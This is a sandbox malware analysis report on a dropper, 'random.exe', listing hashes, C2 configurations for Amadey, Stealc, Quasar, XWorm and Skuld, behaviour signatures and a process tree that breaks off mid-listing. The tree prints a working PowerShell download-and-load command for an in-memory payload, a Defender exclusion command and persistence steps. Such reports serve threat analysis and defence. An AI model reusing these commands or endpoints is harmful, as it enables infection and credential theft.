Overview

overview

10

Static

static

3

random.exe

windows7-x64

10

random.exe

windows10-2004-x64

10

random.exe

windows10-ltsc_2021-x64

10

random.exe

windows11-21h2-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    151s
  • platform
    windows10-ltsc_2021_x64
  • resource
    win10ltsc2021-20250314-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
  • submitted
    22/03/2025, 12:37

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    random.exe

  • Size

    5.5MB

  • MD5

    8aa52be570da2efe4885957e29b89538

  • SHA1

    2ad2e47c307b34d9a593e21dfe0dba723c110b3d

  • SHA256

    a66ad1178645f946e6e9b98c181e660df8bf87c38c88b220a24f35f0406cc107

  • SHA512

    c685dd857057879a6ff8bdb7279511e940babeb7f358a94e33fea308ac0bd8ceb6d2bcd758dd38eada0995bb96f910d5728c1431286f0875d2ca392b0ca7308e

  • SSDEEP

    98304:ZDpKjlkbVghclaJ8RhIc1pX452gw8QzbRwm5H3gzIFNM2w+1R:yxQZFzQQ/5HvX9

Score
10/10
amadeyquasarskuldstealcvidarxworm06bcb9092155telegramtrumpagilenetcredential_accessdefense_evasiondiscoveryexecutionpersistenceratspywarestealerthemidatrojanupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://196.251.91.42/up/uploads/encryption02.jpg
exe.dropper

http://196.251.91.42/up/uploads/encryption02.jpg

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

skuld

C2

https://discordapp.com/api/webhooks/1349647136895012916/qSys_fpsL_y7usKH_AyrFupSjzSsVfg2t895g2HV8Yz72asrwCIsHaqqhPtDFjz8g8_E

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Extracted

Family

xworm

Version

5.0

C2

httpss.myvnc.com:1907

Mutex

xWIArEKzuXpfRVkJ

Attributes
  • install_file

    USB.exe

aes.plain

Extracted

Family

quasar

Version

1.3.0.0

Botnet

TELEGRAM

C2

212.56.35.232:101

Mutex

QSR_MUTEX_L5s39LpA1y9H79tL6D

Attributes
  • encryption_key

    oBOMHICrtHceojCPrnpp

  • install_name

    svchost.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    svchosta

  • subdirectory

    media

Extracted

Family

amadey

Version

5.33

Botnet

06bcb9

C2

http://195.82.146.131

Attributes
  • install_dir

    06a5c50e21

  • install_file

    tgvazx.exe

  • strings_key

    1861b156ffe931ec912bb17b5ff77a36

  • url_paths

    /h8ejjcsDs/index.php

rc4.plain

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detect Vidar Stealer 6 IoCs
    stealer
  • Detect Xworm Payload 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 1 IoCs
  • Skuld family
    skuld
  • Skuld stealer

    An info stealer written in Go lang.

    stealerskuld
  • Stealc

    Stealc is an infostealer written in C++.

    stealerstealc
  • Stealc family
    stealc
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
    defense_evasion
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 16 IoCs
  • Uses browser remote debugging 2 TTPs 18 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

    credential_accessstealer
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 5 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 26 IoCs
  • Identifies Wine through registry keys 2 TTPs 8 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 50 IoCs
  • Obfuscated with Agile.Net obfuscator 2 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

    agilenet
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Themida packer 6 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 5 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    defense_evasiontrojan
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
    discovery
  • Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 14 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 37 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 12 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 58 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Views/modifies file attributes 1 TTPs 1 IoCs
    defense_evasion

Processes

  • C:\Windows\system32\sihost.exe
    sihost.exe
    1⤵
      PID:2764
      • C:\Windows\SysWOW64\svchost.exe
        "C:\Windows\System32\svchost.exe"
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:5828
    • C:\Users\Admin\AppData\Local\Temp\random.exe
      "C:\Users\Admin\AppData\Local\Temp\random.exe"
      1⤵
      • Adds Run key to start application
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4432
      • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\G8U31.exe
        C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\G8U31.exe
        2⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5608
        • C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1P27l3.exe
          C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\1P27l3.exe
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:3588
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:2052
            • C:\Users\Admin\AppData\Local\Temp\10283690101\50KfF6O.exe
              "C:\Users\Admin\AppData\Local\Temp\10283690101\50KfF6O.exe"
              5⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Suspicious use of AdjustPrivilegeToken
              PID:6012
              • C:\Windows\system32\attrib.exe
                attrib +h +s C:\Users\Admin\AppData\Local\Temp\10283690101\50KfF6O.exe
                6⤵
                • Views/modifies file attributes
                PID:4852
            • C:\Users\Admin\AppData\Local\Temp\10286670101\zx4PJh6.exe
              "C:\Users\Admin\AppData\Local\Temp\10286670101\zx4PJh6.exe"
              5⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Windows directory
              • System Location Discovery: System Language Discovery
              PID:4688
              • C:\Windows\SysWOW64\CMD.exe
                "C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
                6⤵
                • System Location Discovery: System Language Discovery
                PID:4372
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  7⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4456
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /I "opssvc wrsa"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:5592
                • C:\Windows\SysWOW64\tasklist.exe
                  tasklist
                  7⤵
                  • Enumerates processes with tasklist
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4224
                • C:\Windows\SysWOW64\findstr.exe
                  findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:4636
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c md 440824
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:404
                • C:\Windows\SysWOW64\extrac32.exe
                  extrac32 /Y /E Architecture.wmv
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:5844
                • C:\Windows\SysWOW64\findstr.exe
                  findstr /V "Offensive" Inter
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2932
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:1560
                • C:\Windows\SysWOW64\cmd.exe
                  cmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:5096
                • C:\Users\Admin\AppData\Local\Temp\440824\Organizations.com
                  Organizations.com h
                  7⤵
                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:1856
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 1856 -s 1008
                    8⤵
                    • Program crash
                    PID:4832
                • C:\Windows\SysWOW64\choice.exe
                  choice /d y /t 5
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:4120
            • C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe
              "C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Loads dropped DLL
              • Checks whether UAC is enabled
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:2148
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\File.bat" "
                6⤵
                • Drops startup file
                • System Location Discovery: System Language Discovery
                PID:4744
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cDovLzE5Ni4yNTEuOTEuNDIvdXAvdXBsb2Fkcy9lbmNyeXB0aW9uMDIuanBn'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('httpss.myvnc.com', '1907');"
                  7⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3036
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ohbuGGy.exe"
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1236
              • C:\Windows\SysWOW64\schtasks.exe
                "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ohbuGGy" /XML "C:\Users\Admin\AppData\Local\Temp\tmp45BE.tmp"
                6⤵
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:1812
              • C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe
                "C:\Users\Admin\AppData\Local\Temp\10286880101\k3t05Da.exe"
                6⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of AdjustPrivilegeToken
                PID:5232
            • C:\Users\Admin\AppData\Local\Temp\10287840101\advnrNo.exe
              "C:\Users\Admin\AppData\Local\Temp\10287840101\advnrNo.exe"
              5⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:3668
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                6⤵
                • Uses browser remote debugging
                • Drops file in Windows directory
                • Checks processor information in registry
                • Enumerates system info in registry
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:444
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffe99f6dcf8,0x7ffe99f6dd04,0x7ffe99f6dd10
                  7⤵
                    PID:1660
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2020,i,13837064180718159004,1347506582855122668,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2016 /prefetch:2
                    7⤵
                      PID:2664
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1644,i,13837064180718159004,1347506582855122668,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2284 /prefetch:3
                      7⤵
                        PID:2132
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2392,i,13837064180718159004,1347506582855122668,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2584 /prefetch:8
                        7⤵
                          PID:5364
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3232,i,13837064180718159004,1347506582855122668,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3300 /prefetch:1
                          7⤵
                          • Uses browser remote debugging
                          PID:2144
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,13837064180718159004,1347506582855122668,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3324 /prefetch:1
                          7⤵
                          • Uses browser remote debugging
                          PID:1448
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4328,i,13837064180718159004,1347506582855122668,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4320 /prefetch:2
                          7⤵
                          • Uses browser remote debugging
                          PID:3632
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4616,i,13837064180718159004,1347506582855122668,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4684 /prefetch:1
                          7⤵
                          • Uses browser remote debugging
                          PID:4376
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4812,i,13837064180718159004,1347506582855122668,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5112 /prefetch:8
                          7⤵
                            PID:2168
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5400,i,13837064180718159004,1347506582855122668,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5396 /prefetch:8
                            7⤵
                              PID:5612
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                            6⤵
                            • Uses browser remote debugging
                            PID:1224
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --edge-skip-compat-layer-relaunch
                              7⤵
                              • Uses browser remote debugging
                              • Drops file in Windows directory
                              • Enumerates system info in registry
                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                              • Suspicious use of FindShellTrayWindow
                              PID:388
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x234,0x7ffe9aa5f208,0x7ffe9aa5f214,0x7ffe9aa5f220
                                8⤵
                                  PID:6136
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2136,i,1755253638733941074,6288481552322640535,262144 --variations-seed-version --mojo-platform-channel-handle=2132 /prefetch:2
                                  8⤵
                                    PID:3244
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1824,i,1755253638733941074,6288481552322640535,262144 --variations-seed-version --mojo-platform-channel-handle=2180 /prefetch:3
                                    8⤵
                                      PID:2952
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2476,i,1755253638733941074,6288481552322640535,262144 --variations-seed-version --mojo-platform-channel-handle=2000 /prefetch:8
                                      8⤵
                                        PID:5380
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3528,i,1755253638733941074,6288481552322640535,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1
                                        8⤵
                                        • Uses browser remote debugging
                                        PID:3476
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3544,i,1755253638733941074,6288481552322640535,262144 --variations-seed-version --mojo-platform-channel-handle=3564 /prefetch:1
                                        8⤵
                                        • Uses browser remote debugging
                                        PID:3876
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\tjmy5" & exit
                                    6⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:2652
                                    • C:\Windows\SysWOW64\timeout.exe
                                      timeout /t 11
                                      7⤵
                                      • System Location Discovery: System Language Discovery
                                      • Delays execution with timeout.exe
                                      PID:4564
                                • C:\Users\Admin\AppData\Local\Temp\10287990101\wjfOfXh.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10287990101\wjfOfXh.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:3256
                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10288540141\4wAPcC0.ps1"
                                  5⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • System Location Discovery: System Language Discovery
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:4524
                                  • C:\Windows\system32\windowspowershell\v1.0\powershell.exe
                                    "C:\Windows\sysnative\windowspowershell\v1.0\powershell.exe"
                                    6⤵
                                    • Drops file in Windows directory
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:4640
                                • C:\Users\Admin\AppData\Local\Temp\10288740101\Kr9UTz2.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10288740101\Kr9UTz2.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  • Suspicious use of SetThreadContext
                                  PID:4456
                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                    6⤵
                                      PID:6108
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                      6⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:5532
                                  • C:\Users\Admin\AppData\Local\Temp\10291530101\OkH8IPF.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10291530101\OkH8IPF.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    • Suspicious use of SetThreadContext
                                    PID:4248
                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                      6⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1492
                                  • C:\Users\Admin\AppData\Local\Temp\10293650101\weC48Q7.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10293650101\weC48Q7.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    PID:5176
                                    • C:\Users\Admin\AppData\Local\Temp\onefile_5176_133871208216126310\windowscore.exe
                                      C:\Users\Admin\AppData\Local\Temp\10293650101\weC48Q7.exe
                                      6⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:3476
                                  • C:\Users\Admin\AppData\Local\Temp\10293930101\ARxx7NW.exe
                                    "C:\Users\Admin\AppData\Local\Temp\10293930101\ARxx7NW.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    • Drops file in Program Files directory
                                    PID:2304
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
